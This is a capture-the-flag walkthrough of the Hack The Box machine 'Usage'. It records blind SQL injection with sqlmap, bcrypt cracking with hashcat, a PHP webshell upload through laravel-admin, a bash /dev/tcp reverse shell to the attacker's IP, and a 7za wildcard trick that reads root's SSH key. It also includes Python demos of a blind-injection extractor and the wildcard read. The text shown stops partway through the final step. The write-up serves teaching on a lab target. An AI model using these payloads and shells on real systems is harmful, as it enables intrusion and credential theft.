HTB Usage writeup (drill the fundamentals until "the ground shakes")
Experienced folks, feel free to skip this one!
Usage attack chain:
★ SQL injection (password reset form)
★ PHP file upload bypass (laravel-admin avatar upload)
★ Password reuse (Monit web credential reused for a system account)
★ sudo privilege escalation
★ 7za wildcard abuse: a crafted @listfile argument turns 7za into an arbitrary file read as root
Information gathering
nmap
└─$ nmap -p- --min-rate 1000 10.10.11.18
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-26 15:03 CST
Nmap scan report for 10.10.11.18
Host is up (0.23s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 83.27 seconds
└─$ nmap -p22,80 -sCV --min-rate 1000 10.10.11.18
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-26 15:05 CST
Nmap scan report for 10.10.11.18
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
|_ 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.66 seconds
The target exposes SSH on port 22 and HTTP (nginx 1.18.0) on port 80. The HTTP title shows a redirect to http://usage.htb/, so that hostname has to be resolved locally.
http
Map usage.htb to the target IP in /etc/hosts (not /etc/passwd, which holds user accounts):
echo "10.10.11.18 usage.htb" | sudo tee -a /etc/hosts
http://usage.htb/


The web application has login, registration and password reset features. The page references the subdomain admin.usage.htb; add it to the same /etc/hosts entry:
10.10.11.18 usage.htb admin.usage.htb
http://admin.usage.htb/

ffuf
└─$ ffuf -u http://usage.htb/ -H "Host: FUZZ.usage.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 -fs 178
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://usage.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.usage.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 178
________________________________________________
admin [Status: 200, Size: 3304, Words: 493, Lines: 89, Duration: 752ms]
:: Progress: [114442/114442] :: Job [1/1] :: 586 req/sec :: Duration: [0:09:18] :: Errors: 0 ::
No other subdomains turned up: only admin, which stands out from the 178-byte default response that -fs 178 filters away.
Shell as dash
Register a test account test@test.com/test and look at the password reset. The flow works like this: entering an email and clicking reset sends a request to reset the password and redirects back to the current page, then the page automatically issues a second request to fetch the result of the reset.




Sending a single quote in the email field changes the response, which confirms SQL injection.

sqlmap
Dump the database with sqlmap. The reset request was saved from Burp into req.log (-l), the injectable parameter is email, and the two tables of interest are users and admin_users. The HTTP 419 responses seen during the run are Laravel's CSRF token mismatch: the _token in the saved request only lives as long as its laravel_session, so re-capture the request (or let sqlmap refresh it with --csrf-token=_token and --csrf-url pointing at the form) if a run stalls.
└─$ sqlmap -l req.log --threads 10 --level 5 --risk 3 --batch -p email -D usage_blog -T users,admin_users --dump
___
__H__
___ ___[)]_____ ___ ___ {1.9.6#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:52:33 /2025-09-28/
[15:52:33] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://usage.htb:80/forget-password
Cookie: XSRF-TOKEN=eyJpdiI6InJUQlE0Ry8raXR1ZlMrRXh6N1JVeHc9PSIsInZhbHVlIjoiNDlrRWlCeHYvTXZVTUhDK01jMVQrcXVQdExUUUZSbjFrRjBvNHk4T0VJdlE1ZmRBM1JUVnZGNFpuengrM1BRVlB1cllaTHVZRVdFVjBxbXpyeGtob2MyNEFaMDlVUllySVBSb2doei9wZ3dDZDhxcUxHQkN5M21SS2pVUENVMDAiLCJtYWMiOiI0NGVhMzNmYTc2MDM4MjVlYjc1ODk5OTcyZjMxYWEwNjZlNDBjODk3MGU5ZTJhMzc4MTA3YjNlMTIzNGRjNmUzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5GNEl1WDAwUGsvL3NWUmpzUGFiM0E9PSIsInZhbHVlIjoiUTZIbjNsTEh4QmQwUFNtOW5pVWU3VkRWWDhvNDNkUGNlRCsxS3dhOUhqYVNtVC9XMDdjZUxkWTNBQkFUVWhaRkJNVFhXN2xNUk1qU0dCRkVNR2tSMTFqUlJ4dVhQOEpWcmJnRFh6dHV3ajNHdDA3bXVLSEpZZFV5UGVIMWI1elQiLCJtYWMiOiJjYjc3ZGNkYTNlMmZkMzNlNjllYzJiZWNjNmM0ZGE3NWIxOTRlODkzNDNjOTZlMTQ4YmVjNzA0NDRkNjNkMzMwIiwidGFnIjoiIn0%3D
POST data: _token=jnajHr3kIAkGdKZFf07ZwziqvFuYM4K6gdk7ApQM&email=test%40test.com
do you want to test this URL? [Y/n/q]
> Y
[15:52:33] [INFO] testing URL 'http://usage.htb:80/forget-password'
[15:52:33] [INFO] resuming back-end DBMS 'mysql'
[15:52:33] [INFO] using '/home/VexCjfkNgNW5/.local/share/sqlmap/output/results-09282025_0352pm.csv' as the CSV results file in multiple targets mode
[15:52:33] [INFO] testing connection to the target URL
[15:52:34] [WARNING] the web server responded with an HTTP error code (419) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: _token=psMWZB6IBhYXkVqkF362Ex4TujpYJhMN7Yo6JbZO&email=test@test.com' AND 3675=(SELECT (CASE WHEN (3675=3675) THEN 3675 ELSE (SELECT 8020 UNION SELECT 4074) END))-- Pagk
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: _token=psMWZB6IBhYXkVqkF362Ex4TujpYJhMN7Yo6JbZO&email=test@test.com' AND 3326=BENCHMARK(5000000,MD5(0x706a4f5a))-- ZOoY
---
do you want to exploit this SQL injection? [Y/n] Y
[15:52:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0, Laravel (PHP)
back-end DBMS: MySQL < 5.0.12
...[snip]...
Database: usage_blog
Table: users
[3 entries]
+----+---------------+--------+--------------------------------------------------------------+---------------------+---------------------+----------------+-------------------+
| id | email | name | password | created_at | updated_at | remember_token | email_verified_at |
+----+---------------+--------+--------------------------------------------------------------+---------------------+---------------------+----------------+-------------------+
| 1 | raj@raj.com | raj | $2y$10$7ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4. | 2023-08-17 03:16:02 | 2023-08-17 03:16:02 | NULL | NULL |
| 2 | raj@usage.htb | raj | $2y$10$rbNCGxpWp1HSpO1gQX4uPO.pDg1nszoI/UhwHvfHDdfdfo9VmDJsa | 2023-08-22 08:55:16 | 2023-08-22 08:55:16 | NULL | NULL |
| 3 | test@test.com | test | $2y$10$ENKq5zVIrk3lVqeJsxIwq.E | 2025-06-23 07:11:03 | 2025-09-26 06:53:37 | NULL | NULL |
+----+---------------+--------+--------------------------------------------------------------+---------------------+---------------------+----------------+-------------------+
[15:52:53] [INFO] table 'usage_blog.users' dumped to CSV file '/home/VexCjfkNgNW5/.local/share/sqlmap/output/usage.htb/dump/usage_blog/users.csv'
...[snip]...
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[15:52:53] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[15:53:12] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[15:53:13] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[15:53:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
...[snip]...
Database: usage_blog
Table: admin_users
[1 entry]
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+-----------------------------------+
| id | name | avatar | password | username | created_at | updated_at | remember_token |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+-----------------------------------+
| 1 | Administrator | <blank> | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | admin | 2023-08-13 02:48:26 | 2023-08-23 06:02:19 | kThXIKu7GhLpgwStz7fCFxjDomCYS1SmP |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+-----------------------------------+
[15:53:16] [INFO] table 'usage_blog.admin_users' dumped to CSV file '/home/VexCjfkNgNW5/.local/share/sqlmap/output/usage.htb/dump/usage_blog/admin_users.csv'
[15:53:16] [WARNING] HTTP error codes detected during run:
419 (?) - 58 times
[15:53:16] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/VexCjfkNgNW5/.local/share/sqlmap/output/results-09282025_0352pm.csv'
[*] ending @ 15:53:16 /2025-09-28/
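To make visible what sqlmap's boolean-based blind payload above is actually doing, here is the same technique written by hand. This is an added example, not code from the writeup or from the box. The target is emulated with an in-memory SQLite table (a Laravel/MySQL host is not available offline), so the ASCII()/SUBSTRING() functions of MySQL are swapped for SQLite's UNICODE()/SUBSTR() through the funcs parameter; the sample rows, the vulnerable_reset_lookup function and the email/password values used in the emulation are all constructed for the demo. The oracle only learns "a row matched" or "no row matched", exactly the signal the reset form leaks, and it recovers the raj@usage.htb hash one character at a time with a binary search over the byte value.

```python
"""Boolean-based blind SQL injection extractor, emulated against SQLite."""
import sqlite3
from typing import Callable

# Constructed sample rows standing in for usage_blog.users (second hash is the
# value the dump above shows for raj@usage.htb, used as the secret to recover).
SAMPLE_USERS = [
    ("test@test.com", "$2y$10$ENKq5zVIrk3lVqeJsxIwq.E"),
    ("raj@usage.htb", "$2y$10$rbNCGxpWp1HSpO1gQX4uPO.pDg1nszoI/UhwHvfHDdfdfo9VmDJsa"),
]

# (ascii_fn, substr_fn) per dialect: MySQL on the real target, SQLite here.
MYSQL_FUNCS = ("ASCII", "SUBSTRING")
SQLITE_FUNCS = ("UNICODE", "SUBSTR")


def build_target() -> sqlite3.Connection:
    """In-memory stand-in for the usage_blog database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (email, password) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_reset_lookup(conn: sqlite3.Connection, email: str) -> bool:
    """The bug class in the reset handler (hypothetical stand-in): the submitted
    email is concatenated into the query. The caller only learns whether a row
    matched, which is the single bit the blind extraction is built on."""
    sql = f"SELECT id FROM users WHERE email = '{email}'"
    return conn.execute(sql).fetchone() is not None


def blind_payload(known_email: str, subquery: str, pos: int, cmp: str,
                  funcs: tuple[str, str]) -> str:
    """Build the email value: a real address, then an AND on one character of
    the secret, then a comment that swallows the closing quote."""
    ascii_fn, substr_fn = funcs
    return f"{known_email}' AND {ascii_fn}({substr_fn}(({subquery}),{pos},1)) {cmp}-- -"


def extract_string(oracle: Callable[[str], bool], known_email: str, subquery: str,
                   funcs: tuple[str, str], max_len: int = 128) -> str:
    """Recover a string one character at a time. A binary search over the byte
    value costs 7 oracle calls per character instead of up to 127."""
    result = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # invariant: lo <= value <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(blind_payload(known_email, subquery, pos, f"> {mid}", funcs)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end SUBSTR yields ''/NULL, every comparison is false
            break
        result.append(chr(lo))
    return "".join(result)


def demo() -> str:
    """Extract raj@usage.htb's bcrypt hash through the emulated reset form."""
    conn = build_target()

    def oracle(email: str) -> bool:
        return vulnerable_reset_lookup(conn, email)

    return extract_string(
        oracle, "test@test.com",
        "SELECT password FROM users WHERE email='raj@usage.htb'", SQLITE_FUNCS,
    )


if __name__ == "__main__":
    print(demo())
```

Against the real box each oracle call is a POST to /forget-password, and because Laravel checks the _token against the laravel_session, the oracle has to fetch a fresh form (token plus cookie) before every request or it gets the 419 seen in the sqlmap log instead of a usable true/false.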
hashcat
Crack the bcrypt hashes with hashcat.
└─$ cat hash
$2y$10$7ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4.
$2y$10$rbNCGxpWp1HSpO1gQX4uPO.pDg1nszoI/UhwHvfHDdfdfo9VmDJsa
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2
Identify the hash type ($2y$ prefix, cost factor 10: bcrypt, mode 3200).
└─$ hashcat --identify hash
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
Crack them in straight (dictionary) mode against rockyou.txt; bcrypt at cost 10 is slow on a CPU, but all three fall within the first few thousand candidates.
└─# hashcat -a 0 -m 3200 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz, 2189/4442 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2:whatever1
$2y$10$rbNCGxpWp1HSpO1gQX4uPO.pDg1nszoI/UhwHvfHDdfdfo9VmDJsa:xander
$2y$10$7ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4.:xander
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: hash
Time.Started.....: Sun Sep 28 16:21:58 2025 (1 min, 32 secs)
Time.Estimated...: Sun Sep 28 16:23:30 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 65 H/s (3.65ms) @ Accel:4 Loops:16 Thr:1 Vec:1
Recovered........: 3/3 (100.00%) Digests (total), 3/3 (100.00%) Digests (new), 3/3 (100.00%) Salts
Progress.........: 6528/43033152 (0.02%)
Rejected.........: 0/6528 (0.00%)
Restore.Point....: 2160/14344384 (0.02%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: monalisa -> telefon
Hardware.Mon.#1..: Util: 89%
Started: Sun Sep 28 16:21:53 2025
Stopped: Sun Sep 28 16:23:32 2025
The credentials recovered from the database are raj@raj.com/xander, raj@usage.htb/xander and admin/whatever1. Logging in to http://admin.usage.htb with admin/whatever1 succeeds.

The admin panel identifies its framework as laravel-admin 1.8.17, which is affected by CVE-2023-24249 (unrestricted file upload through the avatar field leading to RCE). It can be exploited by hand or with a public script.

manual
laravel-admin 1.8.17 RCE
Prepare a one-line PHP webshell:
<?php system($_GET['cmd']); ?>
Upload a normal profile image, intercept the request in Burp Suite, change the file extension to .php and replace the image body with the webshell. The server keeps the .php name under public/uploads/images/, so the shell is reachable over HTTP and takes commands via the cmd parameter.




bash -c 'bash -i >& /dev/tcp/10.10.16.9/9000 0>&1'
URL-encoded so it survives as the cmd query parameter:
%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%36%2e%39%2f%39%30%30%30%20%30%3e%26%31%27

nc -lvnp 9000
...[snip]...
dash@usage:/var/www/html/project_admin/public/uploads/images$ id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
Upgrade to a fully interactive TTY:
dash@usage:/var/www/html/project_admin/public/uploads/images$ script /dev/null -c bash
<min/public/uploads/images$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
dash@usage:/var/www/html/project_admin/public/uploads/images$ ^Z
zsh: suspended nc -lvnp 9000
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 9000
reset
reset: unknown terminal type unknown
Terminal type? screen
<oject_admin/public/uploads/images$ stty rows 29 columns 117
dash@usage:/var/www/html/project_admin/public/uploads/images$ id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
script
└─$ git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
Cloning into 'CVE-2023-24249-Exploit'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 9 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (9/9), 5.92 KiB | 2.96 MiB/s, done.
Resolving deltas: 100% (1/1), done.
└─$ cd CVE-2023-24249-Exploit
└─$ python exploit.py -u http://admin.usage.htb -U admin -P whatever1 -i 10.10.16.9 -p 9001
/home/VexCjfkNgNW5/hackthebox/ippsec/Usage/CVE-2023-24249-Exploit/exploit.py:8: SyntaxWarning: invalid escape sequence '\ '
/ __\ \ / / __|_|_ ) \_ )__ /__|_ ) | |_ ) | |/ _ \\
_____ _____ ___ __ ___ ____ ___ _ _ ___ _ _ ___
/ __\ \ / / __|_|_ ) \_ )__ /__|_ ) | |_ ) | |/ _ \
| (__ \ V /| _|___/ / () / / |_ \___/ /|_ _/ /|_ _\_, /
\___| \_/ |___| /___\__/___|___/ /___| |_/___| |_| /_/ EXPLOIT by IDUZZEL
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at 10.10.16.9:9001
shell
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.11.18] 50058
bash: cannot set terminal process group (1223): Inappropriate ioctl for device
bash: no job control in this shell
dash@usage:/var/www/html/project_admin/public/uploads/images$ id
id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
dash@usage:/var/www/html/project_admin/public/uploads/images$
Shell as xander
Accounts with a login shell on the target:
dash@usage:/var/www/html/project_admin/public/uploads/images$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
dash:x:1000:1000:dash:/home/dash:/bin/bash
xander:x:1001:1001::/home/xander:/bin/bash
Home directory contents:
dash@usage:~$ ls -la
total 52
drwxr-x--- 6 dash dash 4096 Sep 29 00:09 .
drwxr-xr-x 4 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Apr 2 2024 .bash_history -> /dev/null
-rw-r--r-- 1 dash dash 3771 Jan 6 2022 .bashrc
drwx------ 3 dash dash 4096 Aug 7 2023 .cache
drwxrwxr-x 4 dash dash 4096 Aug 20 2023 .config
drwxrwxr-x 3 dash dash 4096 Aug 7 2023 .local
-rw-r--r-- 1 dash dash 32 Oct 26 2023 .monit.id
-rw-r--r-- 1 dash dash 6 Sep 29 00:09 .monit.pid
-rw------- 1 dash dash 1192 Sep 29 00:09 .monit.state
-rwx------ 1 dash dash 707 Oct 26 2023 .monitrc
-rw-r--r-- 1 dash dash 807 Jan 6 2022 .profile
drwx------ 2 dash dash 4096 Aug 24 2023 .ssh
-rw-r----- 1 root dash 33 Sep 28 08:36 user.txt
Some interesting files: .monit.id, .monit.pid, .monit.state and .monitrc.
All four belong to Monit, an open-source process supervisor for Unix-like systems. Monit watches services (processes, files, directories and so on), detects failures and reacts automatically, for example by restarting a service. These files normally live in Monit's working directory or in the user's home directory.
.monitrc
Monit's main configuration (control) file: a plain-text file with Monit's global settings and the monitoring rules for each service. Monit refuses to start unless it is readable only by its owner, which is why it is mode 0700 here, and it is where credentials such as the httpd login end up in clear text.
.monit.pid
Monit's own PID lock file, a small text file holding the process ID of the Monit daemon.
.monit.state
Monit's state file, which persists the runtime state of the monitored services across restarts.
.monit.id
Monit's unique-ID file, a small text file holding the identifier of this Monit instance.
dash@usage:~$ cat .monitrc
#Monitoring Interval in Seconds
set daemon 60
#Enable Web Access
set httpd port 2812
use address 127.0.0.1
allow admin:3nc0d3d_pa$$w0rd
...[snip]...
The Monit web interface credential admin:3nc0d3d_pa$$w0rd is reused as xander's system password (password reuse), so it works straight over SSH:
└─$ ssh xander@10.10.11.18
xander@10.10.11.18's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
...[snip]...
xander@usage:~$ id
uid=1001(xander) gid=1001(xander) groups=1001(xander)
Shell as root
sudo -l
/etc/sudoers can let an ordinary user run specific commands as root (or another user) through sudo; sudo -l lists what this account is allowed.
xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User xander may run the following commands on usage:
(ALL : ALL) NOPASSWD: /usr/bin/usage_management
It is a native 64-bit ELF executable, and it is not stripped, so symbol and string names survive.
xander@usage:~$ file /usr/bin/usage_management
/usr/bin/usage_management: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=fdb8c912d98c85eb5970211443440a15d910ce7f, for GNU/Linux 3.2.0, not stripped
Compute its md5 hash to look it up on VirusTotal:
xander@usage:~$ md5sum /usr/bin/usage_management
f3c1b2b1ccacc24cc7ed8f3ad62bb7c6 /usr/bin/usage_management

No match on VirusTotal, meaning the file has never been submitted there (it is custom to this box). Look at its strings instead:
xander@usage:~$ strings /usr/bin/usage_management
/lib64/ld-linux-x86-64.so.2
...[snip]...
/var/www/html
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
Error changing working directory to /var/www/html
/usr/bin/mysqldump -A > /var/backups/mysql_backup.sql
Password has been reset.
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3):
Invalid choice.
:*3$"
GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0
...[snip]...
xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7313P 16-Core Processor (A00F11),ASM,AES-NI)
Scanning the drive:
2984 folders, 17972 files, 114778695 bytes (110 MiB)
Creating archive: /var/backups/project.zip
Items to compress: 20956
Files read from disk: 17972
Archive size: 54871391 bytes (53 MiB)
Everything is Ok
From the strings and the test run: executing sudo /usr/bin/usage_management and choosing 1 changes into /var/www/html and runs 7za a /var/backups/project.zip -tzip -snl -mmt -- * to archive everything in that directory. The whole command line appears as one string, so it is handed to a shell and the * is expanded there; -snl stores symlinks as links instead of following them, so a plain symlink to a root-owned file is not, on its own, enough to read it.
7za is the command-line version of 7-Zip, an open-source archiver that handles 7z, ZIP, TAR and other formats using LZMA-style compression. Besides compressing to save space it can encrypt archives and split large files, and it is the usual choice for scripts and headless environments.

exploit
/var/www/html is world-writable (drwxrwxrwx), so xander can drop files there. Create a symlink named test pointing at /root/.ssh/id_rsa, then an empty file literally named @test. When the shell expands *, @test becomes an argument, and 7-Zip treats an argument of the form @name as a listfile: it opens name and reads one path to add per line. Since test resolves to the private key, every line of the key is parsed as a file name, none of them exists, and each one is echoed back in a "No more files" warning. Running sudo /usr/bin/usage_management and choosing 1 therefore prints /root/.ssh/id_rsa to the console.
xander@usage:/var/www/html$ ln -s /root/.ssh/id_rsa test
xander@usage:/var/www/html$ touch @test
xander@usage:/var/www/html$ ls -la
total 16
drwxrwxrwx 4 root xander 4096 Sep 29 01:00 .
drwxr-xr-x 3 root root 4096 Apr 2 2024 ..
drwxrwxr-x 13 dash dash 4096 Apr 2 2024 project_admin
-rw-rw-r-- 1 xander xander 0 Sep 29 01:00 @test
lrwxrwxrwx 1 xander xander 17 Sep 29 01:00 test -> /root/.ssh/id_rsa
drwxrwxr-x 12 dash dash 4096 Apr 2 2024 usage_blog
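The two ingredients of this bug, shell glob expansion turning a file name into an argument and 7-Zip's @listfile handling reading through the symlink, reproduced as an added example (not code from the writeup or from usage_management). 7za itself is not required: emulated_7za_add below models only the listfile rule and the "X : No more files" warning format seen in the output, and the temp directory, the fake id_rsa contents and the hardened_backup variant are constructed for the demo. The hardened version passes the directory itself as the single argument instead of a shell glob, which is the fix a practitioner would make besides not running the backup in a directory unprivileged users can write to.

```python
"""Why `cd DIR && 7za a ... -- *` as root is an arbitrary file read."""
import glob
import os
import tempfile


def expand_glob(workdir: str) -> list[str]:
    """What the shell hands to 7za for `-- *`: every non-dotfile name in workdir.
    `--` ends switch parsing but, as the real run showed, does not disable
    @listfile handling."""
    return sorted(os.path.basename(p) for p in glob.glob(os.path.join(workdir, "*")))


def emulated_7za_add(workdir: str, args: list[str]) -> tuple[list[str], list[str]]:
    """Model of 7za's argument loop (emulation, not 7-Zip code).
    Returns (paths_added, warnings). An argument `@name` is a listfile: `name`
    is opened (following symlinks) and every line is taken as a path to add;
    lines that do not exist become warnings, which is the leak channel."""
    added, warnings = [], []
    for arg in args:
        if arg.startswith("@"):
            listfile = os.path.join(workdir, arg[1:])
            with open(listfile, encoding="utf-8", errors="replace") as fh:
                candidates = [line.rstrip("\n") for line in fh if line.strip()]
        else:
            candidates = [arg]
        for path in candidates:
            if os.path.lexists(os.path.join(workdir, path)):
                added.append(path)
            else:
                warnings.append(f"{path} : No more files")
    return added, warnings


def vulnerable_backup(workdir: str) -> tuple[list[str], list[str]]:
    """usage_management option 1 as seen in strings: cd, then `-- *`."""
    return emulated_7za_add(workdir, expand_glob(workdir))


def hardened_backup(workdir: str) -> tuple[list[str], list[str]]:
    """Same backup with no shell glob: the directory is the only argument, so a
    crafted file name can never become an argument (hypothetical fix)."""
    return emulated_7za_add(workdir, ["."])


def demo() -> tuple[list[str], list[str]]:
    """Recreate the setup from the box in a temp dir: a 'root' secret, a symlink
    named test pointing at it, and an empty file named @test."""
    root = tempfile.mkdtemp()
    secret = os.path.join(root, "id_rsa")          # stands in for /root/.ssh/id_rsa
    with open(secret, "w", encoding="utf-8") as fh:  # constructed key material
        fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                 "AAAAconstructedKEYMATERIAL\n"
                 "-----END OPENSSH PRIVATE KEY-----\n")
    www = os.path.join(root, "html")               # stands in for /var/www/html
    os.mkdir(www)
    os.symlink(secret, os.path.join(www, "test"))
    open(os.path.join(www, "@test"), "w").close()
    _, leaked = vulnerable_backup(www)
    _, safe = hardened_backup(www)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("\n".join(leaked))
    print("hardened warnings:", safe)
```

The leak survives -snl because the symlink is never archived through the link-following path at all: it is read as a listfile, which happens before any entry is added. Any root-readable text file can be dumped this way, one line per warning, as long as its lines are not also valid paths in the working directory.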
Run the backup option again. The key comes out line by line inside 7za's "No more files" warnings:
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7313P 16-Core Processor (A00F11),ASM,AES-NI)
